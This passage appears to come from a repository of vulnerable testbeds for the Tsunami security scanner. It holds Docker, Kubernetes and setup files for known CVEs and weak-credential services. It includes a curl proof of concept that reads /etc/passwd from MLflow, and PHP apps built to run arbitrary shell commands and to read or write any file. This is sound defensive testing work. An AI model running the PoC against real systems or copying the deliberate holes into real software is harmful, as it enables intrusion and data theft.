| 15 | # Create a registered model: 16 | curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/registered-models/create' 17 | 18 | # Link a model version to the malicious run (RUN_ID is coming from the second curl request's response. It is below the lifecycle_stage key in the JSON response): 19 | curl -X POST -H 'Content-Type: application/json' -d '{"name": "poc", "run_id": "RUN_ID", "source": "file:///etc/"}' 'http://127.0.0.1:5000/ajax-api/2.0/mlflow/model-versions/create' 20 | 21 | # Read /etc/passwd: 22 | curl 'http://127.0.0.1:5000/model-versions/get-artifact?path=passwd&name=poc&version=1' 23 | ``` 24 | 25 | In case you cannot trigger the vulnerability, you might need to delete your existing container images because Docker might try to reuse them. 26 | 27 | ``` 28 | sudo docker rmi -f $(sudo docker images -aq) 29 | sudo docker remove $(sudo docker ps -a -q) 30 | ``` 31 | ## Fixed version 32 | ``` 33 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.11.3 mlflow server --host 0.0.0.0 --port 5000 34 | ``` 35 | 36 | The deployed service listens on `localhost:5000` after the docker completes its job. 37 | 38 | ## Vulnerable version 39 | ``` 40 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.9.2 mlflow server --host 0.0.0.0 --port 5000 41 | ``` 42 | 43 | The deployed service listens on `localhost:5000` after the docker completes its job. 44 | -------------------------------------------------------------------------------- /mlflow/weak_credentials/README.md: -------------------------------------------------------------------------------- 1 | # setup 2 | ## vulnerable instance 3 | 1. run the mlflow instance 4 | ```bash 5 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.11.3 mlflow server --app-name basic-auth --host 0.0.0.0 --port 5000 6 | ``` 7 | 2. open http://127.0.0.1:5000. 8 | 3. enter admin/password as username and password. 9 | 10 | ## safe instance 11 | 1. run the mlflow instance 12 | ```bash 13 | docker run -p 127.0.0.1:5000:5000 ghcr.io/mlflow/mlflow:v2.11.3 mlflow server --app-name basic-auth --host 0.0.0.0 --port 5000 14 | ``` 15 | 2. run `curl http://127.0.0.1:5000/api/2.0/mlflow/users/update-password --user admin:password -H "Content-Type: application/json" -d '{"username": "admin", "password": "randomPass"}' -X PATCH` 16 | 2. open http://127.0.0.1:5000. 17 | 3. enter admin/randomPass as username and password which is not the default credentials. 18 | -------------------------------------------------------------------------------- /mongodb/weak_credentials/mongodb.md: -------------------------------------------------------------------------------- 1 | # MongoDB 2 | # Setup 3 | 4 | 1. Create docker image with this command: `docker run --name some-mongo -e MONGO_INITDB_ROOT_USERNAME=root -e MONGO_INITDB_ROOT_PASSWORD=example -d mongo:latest` 5 | 6 | 2. Verify Mongo is working as intended: `docker run -it --rm mongo mongosh --host ip-addr -u username` -------------------------------------------------------------------------------- /mysql/weak_credentials/mysql.md: -------------------------------------------------------------------------------- 1 | # MYSQL 2 | # Setup 3 | 4 | 1. Create docker image with this command: `docker run --name mysql-name -e MYSQL_USER=username -e MYSQL_PASSWORD=password -e MYSQL_ROOT_PASSWORD=rootpassword -d mysql:tag` 5 | 6 | 2. Verify MySQL is working as intended: `docker run -it --rm mysql mysql -h ip-addr -u username -p` -------------------------------------------------------------------------------- /nodejs/node-red/CVE-2021-3223/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM nodered/node-red:1.1.2 2 | 3 | RUN npm install --unsafe-perm --no-update-notifier --no-fund --only=production 4 | 5 | RUN npm install node-red-dashboard@2.23.0 6 | -------------------------------------------------------------------------------- /nodejs/node-red/CVE-2021-3223/README.md: -------------------------------------------------------------------------------- 1 | # Node-RED-Dashboard Directory Traversal Vulnerability (CVE 2021-3223) 2 | 3 | This directory contains the deployment configs for a directory traversal 4 | vulnerability in Node-RED-Dashboard with node-red version (1.1.2). 5 | 6 | The deployed service has name `cve-2021-3223` and listens on port `1880`. 7 | -------------------------------------------------------------------------------- /nodejs/node-red/CVE-2021-3223/node_red_cve_2021_3223.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the vulnerable Node-RED-Dashboard directory. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: cve-2021-3223 6 | labels: 7 | app: cve-2021-3223 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | targetPort: 1880 13 | selector: 14 | app: cve-2021-3223 15 | type: LoadBalancer 16 | --- 17 | # The deployment of the vulnerable Node-RED-Dashboard directory. 18 | apiVersion: apps/v1 19 | kind: Deployment 20 | metadata: 21 | name: cve-2021-3223 22 | labels: 23 | app: cve-2021-3223 24 | spec: 25 | selector: 26 | matchLabels: 27 | app: cve-2021-3223 28 | tier: frontend 29 | strategy: 30 | type: Recreate 31 | template: 32 | metadata: 33 | labels: 34 | app: cve-2021-3223 35 | tier: frontend 36 | spec: 37 | containers: 38 | - name: cve-2021-3223 39 | image: ${node_red_img} 40 | ports: 41 | - containerPort: 1880 42 | 43 | -------------------------------------------------------------------------------- /nodejs/node-red/exposedui/README.md: -------------------------------------------------------------------------------- 1 | # Node-RED exposed UI detector testbed 2 | 3 | This is simply the latest available version of testbed. 4 | 5 | ``` 6 | docker run -it -p 1880:1880 --rm nodered/node-red:latest 7 | ``` 8 | -------------------------------------------------------------------------------- /oracle/weblogic/CVE-2020-14883/Dockerfile: -------------------------------------------------------------------------------- 1 | # Mostly uses the vulnerable weblogic image from https://hub.docker.com/layers/vulhub/weblogic/12.2.1.3-2018/images/sha256-8ddf63df92426e521e60c2db913602394a799921fb3919094aef012e3ad6b13f?context=explore 2 | # In addition, disable on-demand deployment of admin portal to make testing stable. 3 | 4 | FROM vulhub/weblogic:12.2.1.3-2018 5 | 6 | ENV ADMIN_PASSWORD='tsunami1' 7 | 8 | # Disable on demand weblogic deployment 9 | RUN sed -i '34 i cmo.setInternalAppsDeployOnDemandEnabled(false)' /u01/oracle/create-wls-domain.py 10 | 11 | ENTRYPOINT ["/bin/sh","-c"] 12 | CMD ["/u01/oracle/createAndStartEmptyDomain.sh"] 13 | -------------------------------------------------------------------------------- /oracle/weblogic/CVE-2020-14883/README.md: -------------------------------------------------------------------------------- 1 | # Oracle WebLogic RCE CVE-2020-14883 2 | 3 | This directory contains the deployment configs for an Oracle WebLogic 4 | installation that's vulnerable to CVE-2020-14883 RCE exploit. 5 | 6 | The deployed service has name `weblogic-cve-2020-14883` and listens on port 7 | `7001`. 8 | -------------------------------------------------------------------------------- /oracle/weblogic/CVE-2020-14883/weblogic_cve_2020_14883.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing an Oracle WebLogic instance with RCE exploitable Admin Console. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: weblogic-cve-2020-14883 6 | labels: 7 | app: weblogic-cve-2020-14883 8 | spec: 9 | ports: 10 | - port: 7001 11 | name: http 12 | targetPort: 7001 13 | selector: 14 | app: weblogic-cve-2020-14883 15 | type: LoadBalancer 16 | --- 17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: weblogic-cve-2020-14883 21 | labels: 22 | app: weblogic-cve-2020-14883 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: weblogic-cve-2020-14883 27 | tier: frontend 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: weblogic-cve-2020-14883 34 | tier: frontend 35 | spec: 36 | containers: 37 | - name: weblogic-cve-2020-14883 38 | image: ${weblogic_img} 39 | ports: 40 | - containerPort: 7001 41 | -------------------------------------------------------------------------------- /others/http_auth/weak_credentials/http_auth.md: -------------------------------------------------------------------------------- 1 | # HTTP 2 | # Setup 3 | 1. Create docker images with this command: 4 | ``` 5 | docker run -d --name web dockercloud/hello-world 6 | docker run -d -p 80:80 --link web:web --name auth beevelop/nginx-basic-auth 7 | ``` 8 | 2. Verify HTTP is working correctly by doing this command: `curl localhost:80` (add -u foo:bar to test authentication) 9 | -------------------------------------------------------------------------------- /papercut/ng_mf/CVE-2023-27350/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | 3 | ARG PAPERCUT_MAJOR_VER=21.x 4 | ARG PAPERCUT_VERSION=21.0.4.57587 5 | 6 | ARG MYSQL_CONNECTOR_VERSION=8.0.30 7 | ARG MYSQL_CONNECTOR_DOWNLOAD_URL=https://dev.mysql.com/get/Downloads/Connector-J/mysql-connector-java-${MYSQL_CONNECTOR_VERSION}.tar.gz 8 | 9 | # WORKDIR /papercut 10 | 11 | COPY /assets/cupsd.conf /app/cupsd.conf 12 | COPY /assets/image_setup.py /app/image_setup.py 13 | COPY /assets/setup.sh /app/setup.sh 14 | COPY /assets/startup.sh /app/startup.sh 15 | COPY /assets/server.properties /app/server.properties 16 | 17 | RUN bash /app/setup.sh 18 | 19 | EXPOSE 9191 \ 20 | 9192 \ 21 | 9193 \ 22 | 80 23 | 24 | ENTRYPOINT [ "/bin/bash" ] 25 | CMD [ "/startup.sh" ] 26 | -------------------------------------------------------------------------------- /papercut/ng_mf/CVE-2023-27350/Readme.md: -------------------------------------------------------------------------------- 1 | # PaperCut NF/MF Docker images 2 | 3 | --- 4 | 5 | ### Setup 6 | 7 | There are two different methods that can be used to build the dockerfile images. 8 | 9 | Both are to be ran from the same directory that the `readme.md` is located in 10 | 11 | 1. Using `local_builder.sh` (slow, but reliable) 12 | - Run `chmod +x local_builder.sh`, then `./local_builder.sh` 13 | 14 | 2. Using `docker-bake.hcl` (recommended, faster) 15 | - Run `docker buildx bake` 16 | 17 | #### Using the images 18 | 19 | Run the command `docker run -it --rm -p 80:80 papercut_ng_mf:` (see below for the available versions) 20 | 21 | > Note: The `-it` command is not necessary, but it does show the output for the container, aiding in troubleshooting 22 | 23 | --- 24 | 25 | ### Info about the resulting images 26 | 27 | These images simulate a near realistic production environment and are prebuilt/preconfigured to let you get started ASAP. 28 | 29 | They currently consist of two version types: 30 | - Vulnerable (Intended to be used only for testing and in-conjuction with the Tsunami Vulnerability Scanner) 31 | - `papercut_ng_mf:19.2.7.62195` 32 | - `papercut_ng_mf:20.1.4.57927` 33 | - `papercut_ng_mf:21.2.10.62186` 34 | - `papercut_ng_mf:22.0.1.62695` 35 | 36 | Non-vulnerable (patched) 37 | - `papercut_ng_mf:20.1.8.66704` 38 | - `papercut_ng_mf:21.2.12.66701` 39 | - `papercut_ng_mf:22.0.12.66453` -------------------------------------------------------------------------------- /papercut/ng_mf/CVE-2023-27350/assets/image_setup.py: -------------------------------------------------------------------------------- 1 | import requests 2 | 3 | ### Default vars/config used to setup image 4 | 5 | # Setup Page 1 (user = admin, and password = password) 6 | # service=direct/1/SetupAdmin/$Form &\ 7 | # sp=S0 &\ 8 | # Form0=password,passwordVerify,$PropertySelection,$Submit &\ 9 | # password=password &\ 10 | # passwordVerify=password &\ 11 | # $PropertySelectio= &\ 12 | # $Submit=Next 13 | payload_page1 = { 14 | 'service': 'direct/1/SetupAdmin/$Form', 15 | 'sp': 'S0', 16 | 'Form0': 'password,passwordVerify,$PropertySelection,$Submit', 17 | 'password': 'password', 18 | 'passwordVerify': 'password', 19 | '$PropertySelectio': '', 20 | '$Submit': 'Next' 21 | } 22 | 23 | # Setup Page 2 - Print cost 24 | # service=direct/1/SetupOrgType/$Form &\ 25 | # sp=S0 &\ 26 | # Form0=$RadioGroup,$Submit,$Submit$0 &\ 27 | # $RadioGroup=0 &\ 28 | # $Submit=Next 29 | payload_page2 = { 30 | 'service': 'direct/1/SetupOrgType/$Form', 31 | 'sp': 'S0', 32 | 'Form0': '$RadioGroup,$Submit,$Submit$0', 33 | '$RadioGroup': '0', 34 | '$Submit': 'Next' 35 | } 36 | 37 | # Setup Page 3 - SetupUserCredit 38 | # service=direct/1/SetupPrintCost/$Form &\ 39 | # sp=S0 &\ 40 | # Form0=defaultColorPageCost,defaultGrayscalePageCost,$Submit,$Submit$0 &\ 41 | # defaultColorPageCost=$0.00 &\ 42 | # defaultGrayscalePageCost=$0.00 &\ 43 | # $Submit=Next 44 | payload_page3 = { 45 | 'service': 'direct/1/SetupPrintCost/$Form', 46 | 'sp': 'S0', 47 | 'Form0': 'defaultColorPageCost,defaultGrayScalePageCost,$Submit,$Submit$0', 48 | 'defaultColorPageCost': '$0.00', 49 | 'defaultGrayScalePageCost': '$0.00', 50 | '$Submit': 'Next' 51 | } 52 | 53 | # Setup Page 4 - SetupUserSource 54 | # service=direct/1/SetupUserCredit/$Form &\ 55 | # sp=S0 &\ 56 | # Form0=initialCredit,restricted,$Submit,$Submit$0 &\ 57 | # initialCredit=$0.00 &\ 58 | # $Submit=Next 59 | payload_page4 = { 60 | 'service': 'direct/1/SetupUserCredit/$Form', 61 | 'sp': 'S0', 62 | 'Form0': 'initialCredit,restricted,$Submit,$Submit$0', 63 | 'initialCredit': '$0.00', 64 | '$Submit': 'Next' 65 | } 66 | 67 | # Setup Page 5 - SetupVerify 68 | # service=direct/1/SetupUserSource/$Form &\ 69 | # sp=S0 &\ 70 | # Form0=$RadioGroup,$Select,$LinkSubmit,$Submit,$Submit$0 &\ 71 | # $Select=0 &\ 72 | # $RadioGroup=0 &\ 73 | # _linkSubmit= &\ 74 | # $Submit=Next 75 | payload_page5 = { 76 | 'service': 'direct/1/SetupUserSource/$Form', 77 | 'sp': 'S0', 78 | 'Form0': '$RadioGroup,$Select,$LinkSubmit,$Submit,$Submit$0', 79 | '$Select': '0', 80 | '$RadioGroup': '0', 81 | '$_linkSubmit': '', 82 | '$Submit': 'Next' 83 | } 84 | 85 | # Setup Page 6 - SetupCompleted 86 | # service=direct/1/SetupVerify/$Form &\ 87 | # sp=S0 &\ 88 | # Form0=$Submit,$Submit$0 &\ 89 | # $Submit=Confirm 90 | payload_page6 = { 91 | 'service': 'direct/1/SetupVerify/$Form', 92 | 'sp': 'S0', 93 | 'Form0': '$Submit,$Submit$0', 94 | '$Submit': 'Confirm' 95 | } 96 | 97 | ### End default vars/config 98 | 99 | # Local website setup 100 | host = "http://localhost:9191/app" 101 | 102 | headers = { 103 | 'Origin': 'http://localhost:9191' 104 | } 105 | 106 | server_ready = False 107 | 108 | while ( not server_ready ): 109 | try: 110 | resp = requests.get(host) 111 | if (resp.status_code == 200): 112 | server_ready = True 113 | except requests.exceptions.Timeout: 114 | continue 115 | except requests.exceptions.RequestException: 116 | continue 117 | 118 | 119 | 120 | 121 | session = requests.Session() 122 | 123 | session.get(host) 124 | 125 | setup_steps = [ 126 | payload_page1, 127 | payload_page2, 128 | payload_page3, 129 | payload_page4, 130 | payload_page5, 131 | payload_page6 132 | ] 133 | 134 | 135 | 136 | 137 | for step in setup_steps: 138 | resp = session.post(host, data=step, headers=headers) 139 | if resp.status_code != 200: 140 | print(resp.status_code, resp.reason) -------------------------------------------------------------------------------- /papercut/ng_mf/CVE-2023-27350/assets/setup.sh: -------------------------------------------------------------------------------- 1 | #!/usr/share/env bash 2 | 3 | ## Setup Prerequisites 4 | apt update 5 | apt install -y --no-install-recommends wget cpio cups cups-pdf nano curl ca-certificates python3 python3-pip libshell-perl # iptables 6 | 7 | # Add the cups config that opens up port 631 for papercut server 8 | mv /app/cupsd.conf /etc/cups/cupsd.conf 9 | 10 | pip install requests 11 | 12 | useradd -mUd /papercut -s /bin/bash papercut 13 | echo "papercut - nofile 65535" >> /etc/security/limits.conf 14 | 15 | # Get and Setup Papercut NG/MF 16 | wget https://cdn1.papercut.com/web/products/ng-mf/installers/mf/${PAPERCUT_MAJOR_VER}/pcmf-setup-${PAPERCUT_VERSION}.sh -O pcmf-setup.sh 17 | chmod a+rx pcmf-setup.sh 18 | 19 | runuser -l papercut -c "/pcmf-setup.sh -v --non-interactive" 20 | rm -f pcmf-setup.sh 21 | 22 | /papercut/MUST-RUN-AS-ROOT 23 | /etc/init.d/papercut stop 24 | /etc/init.d/papercut-web-print stop 25 | 26 | # Setup the Cups PDF server as a test server 27 | service cups restart 28 | lpadmin -p cups-pdf -v cups-pdf:/ -E -P /usr/share/ppd/cups-pdf/CUPS-PDF_opt.ppd 29 | cupsenable CUPS-PDF 30 | lpoptions -d CUPS-PDF 31 | # service cups restart 32 | 33 | # Setup Mysql 34 | wget ${MYSQL_CONNECTOR_DOWNLOAD_URL} -O mysql.tar.gz 35 | tar -xzvf mysql.tar.gz -C / 36 | rm mysql.tar.gz 37 | mv /mysql-connector-java-${MYSQL_CONNECTOR_VERSION}/mysql-connector-java-${MYSQL_CONNECTOR_VERSION}.jar /papercut/server/lib-ext/ 38 | rm -r /mysql-connector-java-${MYSQL_CONNECTOR_VERSION} 39 | 40 | # Finish Setting up Papercut NG/MF 41 | chown -R papercut:papercut /papercut 42 | chmod +x /papercut/server/bin/linux-x64/setperms 43 | /papercut/server/bin/linux-x64/setperms 44 | apt-get clean autoclean 45 | apt-get autoremove -y 46 | rm -rf /var/lib/{apt,dpkg,cache,log}/ 47 | runuser -l papercut -c "/papercut/server/bin/linux-x64/db-tools init-db -f -q" 48 | 49 | 50 | # Finish setting up image with default/presets 51 | /etc/init.d/papercut start 52 | /etc/init.d/papercut-web-print start 53 | 54 | echo -e "##########################################\n\n" 55 | echo -e Waiting to ensure the Application/Web Print server is fully started 56 | echo -e "##########################################\n\n" 57 | 58 | # Query the papercut web server until a non-error response is received 59 | # curl --retry 12 --retry-delay 5 -s -o /dev/null "http://localhost:9191" 60 | 61 | python3 /app/image_setup.py 62 | 63 | chmod +x /app/startup.sh 64 | mv /app/startup.sh /startup.sh 65 | 66 | /etc/init.d/papercut stop 67 | /etc/init.d/papercut-web-print stop 68 | 69 | mv /app/server.properties /papercut/server/server.properties 70 | -------------------------------------------------------------------------------- /papercut/ng_mf/CVE-2023-27350/assets/startup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | service cups start 4 | 5 | # Port Forwarding 6 | # myip=$(hostname -i) 7 | # /sbin/iptables -t nat -I PREROUTING --src 0/0 --dst $myip -p tcp --dport 80 -j REDIRECT --to-ports 9191 8 | # /sbin/iptables -t nat -I PREROUTING --src 0/0 --dst $myip -p tcp --dport 443 -j REDIRECT --to-ports 9192 9 | 10 | /etc/init.d/papercut console -------------------------------------------------------------------------------- /papercut/ng_mf/CVE-2023-27350/docker-bake.hcl: -------------------------------------------------------------------------------- 1 | group "default" { 2 | targets = ["papercut_image"] 3 | } 4 | 5 | target "papercut_image" { 6 | name = "papercut_ng_mf-${replace(versions.ver, ".","_")}" 7 | matrix = { 8 | versions = [ 9 | // Vulnerable images 10 | { 11 | major_ver = "19.x" 12 | ver = "19.2.7.62195" 13 | }, { 14 | major_ver = "20.x" 15 | ver = "20.1.4.57927" 16 | }, { 17 | major_ver = "21.x" 18 | ver = "21.2.10.62186" 19 | }, { 20 | major_ver = "22.x" 21 | ver = "22.0.1.62695" 22 | }, 23 | 24 | // Non-Vulnerable images 25 | { 26 | major_ver = "20.x" 27 | ver = "20.1.8.66704" 28 | }, { 29 | major_ver = "21.x" 30 | ver = "21.2.12.66701" 31 | }, { 32 | major_ver = "22.x" 33 | ver = "22.0.12.66453" 34 | } 35 | ] 36 | } 37 | 38 | dockerfile = "Dockerfile" 39 | tags = ["papercut_ng_mf:${versions.ver}"] 40 | args = { 41 | PAPERCUT_MAJOR_VER = versions.major_ver 42 | PAPERCUT_VERSION = versions.ver 43 | } 44 | } 45 | 46 | -------------------------------------------------------------------------------- /papercut/ng_mf/CVE-2023-27350/local_builder.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | declare -A vuln_versions=( 4 | ["19.x"]="19.2.7.62195" 5 | ["20.x"]="20.1.4.57927" 6 | ["21.x"]="21.2.10.62186" 7 | ["22.x"]="22.0.1.62695" 8 | ) 9 | 10 | declare -A non_vuln_versions=( 11 | ["20.x"]="20.1.8.66704" 12 | ["21.x"]="21.2.12.66701" 13 | ["22.x"]="22.0.12.66453" 14 | ) 15 | 16 | function build_image() { 17 | echo -n "Building image version: ${2}" 18 | output=`docker build --force-rm --rm --quiet \ 19 | --build-arg="PAPERCUT_MAJOR_VER=${1}" \ 20 | --build-arg="PAPERCUT_VERSION=${2}" \ 21 | --tag papercut_ng_mf:${2} .` 22 | echo " --> ${output}" 23 | } 24 | 25 | echo -e "\n" 26 | echo "##############################################" 27 | echo "##############################################" 28 | echo "### Papercut Docker Images Builder ###" 29 | echo "##############################################" 30 | echo "##############################################" 31 | 32 | echo -e "\n[*] Building Vulnerable Image versions" 33 | for key in ${!vuln_versions[@]} 34 | do build_image $key ${vuln_versions[$key]} 35 | done 36 | 37 | echo -e "\n[*] Building Non-Vulnerable Image versions" 38 | for key in ${!non_vuln_versions[@]} 39 | do build_image $key ${non_vuln_versions[$key]} 40 | done 41 | 42 | echo -e "\n[*] Done!" 43 | -------------------------------------------------------------------------------- /php/arbitrary_file_write_php/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php 2 | 3 | USER root 4 | 5 | COPY startup.sh / 6 | RUN chmod 0744 /startup.sh 7 | 8 | COPY index.php /var/www/html/ 9 | 10 | RUN apt-get update && \ 11 | apt-get install -y procps cron 12 | 13 | EXPOSE 80 14 | 15 | # Start crond and phpd 16 | ENTRYPOINT ["/startup.sh"] 17 | CMD ["php", "-S", "0.0.0.0:80", "-t", "/var/www/html", "/var/www/html/index.php"] 18 | #CMD cron && php -S 0.0.0.0:80 -t /var/www/html /var/www/html/index.php 19 | 20 | 21 | -------------------------------------------------------------------------------- /php/arbitrary_file_write_php/README.md: -------------------------------------------------------------------------------- 1 | # A simple PHP webapp vulnerable to Arbitrary File Write with CRON daemon 2 | 3 | This webapp can be used for testing arbitrary file write exploitation. It was originally created to test 4 | file write to RCE via crontab payload (linux_root_crontab) 5 | 6 | # Setup 7 | 8 | 1. Build with: 9 | 10 | `docker build --platform linux/amd64 -t phpd-arbitrary-file-write` 11 | 12 | 2. Run with: 13 | 14 | `docker run --rm -p 8888:80 --name phpd-app --platform linux/amd64 phpd-arbitrary-file-write` 15 | 16 | 3. Open the webapp at: 17 | 18 | `http://localhost:8888/` 19 | -------------------------------------------------------------------------------- /php/arbitrary_file_write_php/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
\n\n"; 8 | 9 | if (isset($_GET['file']) and isset($_GET['contents'])) { 10 | echo "Writing to ". $_GET['file'] . " with contents:

\n" . $_GET['contents']; 11 | file_put_contents($_GET['file'], $_GET['contents']); 12 | 13 | } else { 14 | echo "Error: This script requires both 'file' and 'contents' GET parameters."; 15 | } 16 | 17 | ?> 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /php/arbitrary_file_write_php/startup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | cron 3 | exec "$@" 4 | -------------------------------------------------------------------------------- /php/phpunit/CVE-2017-9841/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php:7.2-alpine3.9 2 | 3 | EXPOSE 80 4 | 5 | # Install composer 6 | RUN curl -sS https://getcomposer.org/installer | php 7 | RUN mv composer.phar /usr/local/bin/composer 8 | 9 | # Install vulnerable package 10 | RUN composer require phpunit/phpunit:5.6.2 11 | 12 | # Start up the application when the container is started 13 | COPY docker-entrypoint.sh /usr/local/bin/docker-entrypoint.sh 14 | ENTRYPOINT ["/usr/local/bin/docker-entrypoint.sh"] 15 | -------------------------------------------------------------------------------- /php/phpunit/CVE-2017-9841/README.md: -------------------------------------------------------------------------------- 1 | # PHPUnit CVE-2017-9841 2 | 3 | This directory contains the deployment configs for a PHP Application with exposed 4 | PHPUnit library that's vulnerable to CVE-2017-9841 (RCE via eval-stdin.php). 5 | 6 | The deployed service has name `phpunit-cve-2017-9841` and listens on port `80`. 7 | 8 | -------------------------------------------------------------------------------- /php/phpunit/CVE-2017-9841/docker-entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env sh 2 | 3 | php -S 0.0.0.0:80 4 | -------------------------------------------------------------------------------- /php/phpunit/CVE-2017-9841/phpunit-cve-2017-9841.yaml: -------------------------------------------------------------------------------- 1 | # k8s LoadBalancer Service exposing the vulnerable PHP app. 2 | apiVersion: v1 3 | kind: Service 4 | metadata: 5 | name: phpunit-cve-2017-9841 6 | labels: 7 | app: phpunit-cve-2017-9841 8 | spec: 9 | ports: 10 | - port: 80 11 | name: http 12 | selector: 13 | app: phpunit-cve-2017-9841 14 | type: LoadBalancer 15 | --- 16 | # The PHP app. 17 | apiVersion: apps/v1 18 | kind: Deployment 19 | metadata: 20 | name: phpunit-cve-2017-9841 21 | labels: 22 | app: phpunit-cve-2017-9841 23 | spec: 24 | selector: 25 | matchLabels: 26 | app: phpunit-cve-2017-9841 27 | tier: frontend 28 | strategy: 29 | type: Recreate 30 | template: 31 | metadata: 32 | labels: 33 | app: phpunit-cve-2017-9841 34 | tier: frontend 35 | spec: 36 | containers: 37 | - name: phpunit-cve-2017-9841 38 | image: ${phpunit_img} 39 | ports: 40 | - containerPort: 80 41 | -------------------------------------------------------------------------------- /php/rce_and_arbitrary_file_read_php/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM php 2 | 3 | USER root 4 | 5 | COPY startup.sh / 6 | RUN chmod 0744 /startup.sh 7 | 8 | COPY index.php /var/www/html/ 9 | 10 | RUN apt-get update && \ 11 | apt-get install -y procps cron 12 | 13 | EXPOSE 80 14 | 15 | # Start crond and phpd 16 | ENTRYPOINT ["/startup.sh"] 17 | CMD ["php", "-S", "0.0.0.0:80", "-t", "/var/www/html", "/var/www/html/index.php"] 18 | 19 | 20 | -------------------------------------------------------------------------------- /php/rce_and_arbitrary_file_read_php/README.md: -------------------------------------------------------------------------------- 1 | # A simple PHP webapp vulnerable to RCE and Arbitrary File Read 2 | 3 | This webapp can be used for testing RCE and arbitrary file read exploitation. It was originally created to test 4 | blind RCE payload (linux_curl_trace_read). 5 | 6 | # Setup 7 | 8 | 1. Build with: 9 | 10 | `docker build --platform linux/amd64 -t rce-read .` 11 | 12 | 2. Run with: 13 | 14 | `docker run --rm -p 8888:80 --name rce-read --platform linux/amd64 rce-read` 15 | 16 | 3. Open the webapp at: 17 | 18 | `http://localhost:8888/` 19 | -------------------------------------------------------------------------------- /php/rce_and_arbitrary_file_read_php/index.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
\n\n"; 7 | 8 | if (isset($_GET['cmd'])) { 9 | echo "Running [". $_GET['cmd'] . "]

\n"; 10 | system($_GET['cmd']); 11 | 12 | } elseif (isset($_GET['file_to_read']) ) { 13 | echo "Reading ". $_GET['file_to_read']; 14 | echo file_get_contents($_GET['file_to_read']); 15 | 16 | } else { 17 | echo "Error: This script requires 'cmd' or 'file_to_read' parameter."; 18 | } 19 | 20 | ?> 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /php/rce_and_arbitrary_file_read_php/startup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | cron 3 | exec "$@" 4 | -------------------------------------------------------------------------------- /postgres/weak_credentials/postgres.md: -------------------------------------------------------------------------------- 1 | # Postgres 2 | # Setup 3 | 4 | 1. Create docker image with this command: `docker run --name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres:tag` 5 | 6 | 2. Verify Postgres is working as intended: `psql -h ip-addr -U postgres` -------------------------------------------------------------------------------- /rabbitmq/weak_credentials/Dockerfile: -------------------------------------------------------------------------------- 1 | # 2 | # NOTE: THIS DOCKERFILE IS GENERATED VIA "apply-templates.sh" 3 | # 4 | # PLEASE DO NOT EDIT IT DIRECTLY. 5 | # 6 | # This Dockerfile is taken from this repository https://github.com/docker-library/rabbitmq/blob/80011d74327aea3ddd460b189c6533c1f177f48f/3.13-rc/ubuntu/management/Dockerfile 7 | 8 | FROM rabbitmq:3.13-rc 9 | 10 | RUN set eux; \ 11 | rabbitmq-plugins enable --offline rabbitmq_management; \ 12 | # make sure the metrics collector is re-enabled (disabled in the base image for Prometheus-style metrics by default) 13 | rm -f /etc/rabbitmq/conf.d/20-management_agent.disable_metrics_collector.conf; \ 14 | # grab "rabbitmqadmin" from inside the "rabbitmq_management-X.Y.Z" plugin folder 15 | # see https://github.com/docker-library/rabbitmq/issues/207 16 | cp /plugins/rabbitmq_management-*/priv/www/cli/rabbitmqadmin /usr/local/bin/rabbitmqadmin; \ 17 | [ -s /usr/local/bin/rabbitmqadmin ]; \ 18 | chmod +x /usr/local/bin/rabbitmqadmin; \ 19 | apt-get update; \ 20 | apt-get install -y --no-install-recommends python3; \ 21 | rm -rf /var/lib/apt/lists/*; \ 22 | rabbitmqadmin --version 23 | 24 | ENV RABBITMQ_DEFAULT_PASS=root 25 | 26 | EXPOSE 15671 15672 27 | -------------------------------------------------------------------------------- /rabbitmq/weak_credentials/README.md: -------------------------------------------------------------------------------- 1 | # RabbitMQ Management Portal 2 | 3 | ## Setup 4 | 5 | 1. `docker build -t rabbitmq .` 6 | 2. `docker run -d -p 8081:15671 8082:15672 rabbitmq` 7 | 8 | It's important to notice that currently nmap doesn't scan as default the port 15672 where normally is running the management plugin, so in for the sake of testing we are going to map it to a different port 9 | -------------------------------------------------------------------------------- /ray/CVE-2023-48022/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-48022 ray RCE 2 | This directory contains the deployment configs for ray in a configuration 3 | vulnerable to CVE-2023-48022. 4 | The deployed service has name `cve-2023-48022` and listens on port `80`. -------------------------------------------------------------------------------- /ray/CVE-2023-48022/ray.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: cve-2023-48022 5 | labels: 6 | app: cve-2023-48022 7 | spec: 8 | ports: 9 | - port: 80 10 | name: http 11 | targetPort: 8265 12 | selector: 13 | app: cve-2023-48022 14 | type: LoadBalancer 15 | --- 16 | apiVersion: apps/v1 17 | kind: Deployment 18 | metadata: 19 | name: cve-2023-48022 20 | labels: 21 | app: cve-2023-48022 22 | spec: 23 | selector: 24 | 